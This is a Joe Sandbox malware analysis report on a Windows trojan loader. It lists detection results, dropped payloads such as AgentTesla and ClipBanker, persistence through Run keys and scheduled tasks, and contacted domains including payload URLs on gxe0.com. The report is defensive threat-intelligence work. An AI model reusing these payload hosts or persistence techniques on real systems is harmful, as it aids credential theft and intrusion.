Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	151 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	151 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	311 Process Injection	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
2jbMIxCFsK.exe	58%	ReversingLabs	Win32.Trojan.ModiLoader
2jbMIxCFsK.exe	100%	Avira	HEUR/AGEN.1325995
2jbMIxCFsK.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\neworigin.exe	100%	Avira	TR/Spy.Gen8
C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	100%	Avira	HEUR/AGEN.1311721
C:\Users\user\AppData\Local\Temp\server_BTC.exe	100%	Avira	HEUR/AGEN.1311721
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Avira	W32/Infector.Gen
C:\Users\Public\Libraries\Wisrysxl.PIF	100%	Avira	HEUR/AGEN.1325995
C:\Users\user\AppData\Local\Temp\neworigin.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\server_BTC.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Wisrysxl.PIF	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Wisrysxl.PIF	58%	ReversingLabs	Win32.Trojan.ModiLoader
C:\Users\Public\Libraries\lxsyrsiW.pif	3%	ReversingLabs
C:\Users\Public\alpha.pif	0%	ReversingLabs
C:\Users\Public\xpha.pif	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\neworigin.exe	82%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Local\Temp\server_BTC.exe	92%	ReversingLabs	ByteCode-MSIL.Infostealer.ClipBanker
C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	92%	ReversingLabs	ByteCode-MSIL.Infostealer.ClipBanker

Source	Detection	Scanner	Label
https://gxe0.com/yak/233_Wisrysxlfsse	0%	Avira URL Cloud	safe
https://gxe0.com:443/yak/233_Wisrysxlfss	0%	Avira URL Cloud	safe
https://gxe0.com/	0%	Avira URL Cloud	safe
https://gxe0.com/yak/233_Wisrysxlfssl	0%	Avira URL Cloud	safe
https://gxe0.com/yak/233_Wisrysxlfss	0%	Avira URL Cloud	safe
https://gxe0.com/yak/233_Wisrysx	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
gxe0.com	198.252.105.91	true	false	high
pywolwnvd.biz	54.244.188.177	true	false	high
api.ipify.org	104.26.13.205	true	false	high
s82.gocheapweb.com	51.195.88.199	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
https://gxe0.com/yak/233_Wisrysxlfss	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gxe0.com/yak/233_Wisrysx	2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020DCD000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	false		high
https://account.dyn.com/	neworigin.exe, 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://r11.o.lencr.org0#	neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000018.00000002.4530947899.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2286081090.00000000075F7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.	powershell.exe, 0000000B.00000002.2286081090.00000000075F7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.ipify.org/t	neworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2286081090.00000000075F7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gxe0.com/	2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000626000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://r11.i.lencr.org/0	neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000018.00000002.4530947899.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.ipify.org	neworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 0000000B.00000002.2254342461.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gxe0.com/yak/233_Wisrysxlfsse	2jbMIxCFsK.exe, 00000000.00000002.2156227554.00000000005BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmp	false		high
http://s82.gocheapweb.com	neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000018.00000002.4540086325.000000000290C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gxe0.com/yak/233_Wisrysxlfssl	2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000608000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gxe0.com:443/yak/233_Wisrysxlfss	2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000630000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	neworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2254342461.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.pmail.com	2jbMIxCFsK.exe, 2jbMIxCFsK.exe, 00000000.00000002.2224009200.000000002229C000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D44000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002CCD000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2237079375.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2225406008.00000000225FF000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2224009200.000000002223D000.00000004.00000020.00020000.00000000.sdmp, lxsyrsiW.pif, 00000008.00000000.2153332087.0000000000416000.00000002.00000001.01000000.00000006.sdmp, Wisrysxl.PIF, 00000016.00000002.2321565604.0000000002E22000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000017.00000000.2301803862.0000000000416000.00000002.00000001.01000000.00000006.sdmp	false		high
http://ocsp.sectigo.com0C	2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
198.252.105.91	gxe0.com	Canada	20068	HAWKHOSTCA	false
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
51.195.88.199	s82.gocheapweb.com	France	16276	OVHFR	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562866
Start date and time:	2024-11-26 08:12:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	2jbMIxCFsK.exe renamed because original name is a hash value
Original Sample Name:	054899796d592bb5f70b0a9fa28429024a919270a76603626be24068faae59d9.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winEXE@49/26@4/3
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 97% Number of executed functions: 268 Number of non-executed functions: 50
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target TrojanAIbot.exe, PID 6208 because it is empty
Execution Graph export aborted for target server_BTC.exe, PID 3748 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 2jbMIxCFsK.exe

Simulations

Behavior and APIs

Time	Type	Description
02:12:58	API Interceptor	2x Sleep call for process: 2jbMIxCFsK.exe modified
02:13:14	API Interceptor	26x Sleep call for process: powershell.exe modified
02:13:14	API Interceptor	5785634x Sleep call for process: neworigin.exe modified
02:13:15	API Interceptor	2029889x Sleep call for process: TrojanAIbot.exe modified
02:13:22	API Interceptor	2x Sleep call for process: Wisrysxl.PIF modified
08:13:13	Task Scheduler	Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
08:13:13	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
08:13:22	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
08:13:30	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
198.252.105.91	DHL-INVOICE-MBV.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.legaldanaa.com/d0ad/?jXu=gWBUvkz7Th1w/4or5wJyBYQATVQKYMhDH/gPz8FNlyuh7t8wp+tSlul7hgK6xuyfJYQ1BxvuzK7AKBkx6IgPVHnLyXh5nXmxBA==&hZ=5jUpdPs
104.26.13.205	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	Packing List - SAPPHIRE X.xlsx.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	172.67.74.152
	WOOYANG VENUS PARTICULARS.pdf.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	172.67.74.152
	https://app.useblocks.io/getemail/48034?secret_hash=d1541dc5be135b2d0f39c0711cecbe46&raw=true	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	104.26.13.205
	Orden de compra HO-PO-376-25.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	172.67.74.152
	RICHIESTA D'OFFERTA.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	104.26.12.205
	DJ5PhUwOsM.exe	Get hash	malicious	AgentTesla, XWorm	Browse	104.26.13.205
	Ref#2056119.exe	Get hash	malicious	AgentTesla, XWorm	Browse	104.26.13.205
	PO#86637.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	104.26.13.205
	CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	New Purchase Order Document for PO1136908 000 SE.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
gxe0.com	RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	198.252.105.91
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	198.252.105.91
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	198.252.105.91
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	NEOMS_EOI_FORM.cmd	Get hash	malicious	DBatLoader	Browse	198.252.105.91
	NEOMS_EOI_FORM.GZ	Get hash	malicious	DBatLoader	Browse	198.252.105.91
pywolwnvd.biz	PO #09465610_GQ 003745_SO-242000846.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	54.244.188.177
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	54.244.188.177
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	54.244.188.177
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	54.244.188.177
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	54.244.188.177
	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	54.244.188.177
	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	54.244.188.177
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	54.244.188.177
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	54.244.188.177
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	54.244.188.177

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HAWKHOSTCA	Payroll List.exe	Get hash	malicious	FormBook	Browse	198.252.98.54
	RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	198.252.105.91
	MV KODCO.exe	Get hash	malicious	FormBook	Browse	198.252.98.54
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	198.252.105.91
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	198.252.105.91
	Arrival Notice_pdf.exe	Get hash	malicious	FormBook	Browse	198.252.98.54
	PROFORMA INVOICE.exe	Get hash	malicious	FormBook	Browse	198.252.98.54
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
CLOUDFLARENETUS	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	172.67.187.240
	Packing List - SAPPHIRE X.xlsx.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	172.67.74.152
	file.exe	Get hash	malicious	Unknown	Browse	104.21.7.169
	Finish_Agreement_DocuSign.pdf	Get hash	malicious	Unknown	Browse	104.18.95.41
	http://www.btc1yby.blogspot.rs/	Get hash	malicious	GRQ Scam	Browse	172.67.12.83
	WOOYANG VENUS PARTICULARS.pdf.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	172.67.74.152
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.7.169
	kkEzK284oT.exe	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
OVHFR	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	51.38.171.30
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	192.99.154.40
	http://www.kalenderpedia.de	Get hash	malicious	Unknown	Browse	217.182.178.234
	apep.m68k.elf	Get hash	malicious	Unknown	Browse	192.99.178.29
	file.exe	Get hash	malicious	Xmrig	Browse	51.195.43.17
	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	46.105.79.108
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	54.38.112.39
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	137.74.55.109
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	54.39.233.41
	6xQ8CMUaES.exe	Get hash	malicious	Xmrig	Browse	51.89.23.91

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Packing List - SAPPHIRE X.xlsx.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	104.26.13.205
	WOOYANG VENUS PARTICULARS.pdf.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	104.26.13.205
	5QnwxSJVyX.doc	Get hash	malicious	Unknown	Browse	104.26.13.205
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	104.26.13.205
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	104.26.13.205
	file.exe	Get hash	malicious	FormBook	Browse	104.26.13.205
	file.exe	Get hash	malicious	FormBook	Browse	104.26.13.205
	Orden de compra HO-PO-376-25.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	104.26.13.205
	file.exe	Get hash	malicious	Cryptbot	Browse	104.26.13.205
	INV-0542.pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.26.13.205
a0e9f5d64349fb13191bc781f81f42e1	9oKqST-uPDy7iigkXM-C5J2.eml	Get hash	malicious	Unknown	Browse	198.252.105.91
	1m181Ru74o.exe	Get hash	malicious	Remcos, DBatLoader	Browse	198.252.105.91
	jlPBMMQbXC.exe	Get hash	malicious	DBatLoader, Remcos	Browse	198.252.105.91
	qqig1mHX8U.exe	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse	198.252.105.91
	nft438A5fN.exe	Get hash	malicious	DBatLoader, Remcos	Browse	198.252.105.91
	6BE4RDldhw.exe	Get hash	malicious	DBatLoader	Browse	198.252.105.91
	AnyDesk.exe	Get hash	malicious	DBatLoader	Browse	198.252.105.91
	file.exe	Get hash	malicious	Unknown	Browse	198.252.105.91
	file.exe	Get hash	malicious	Unknown	Browse	198.252.105.91
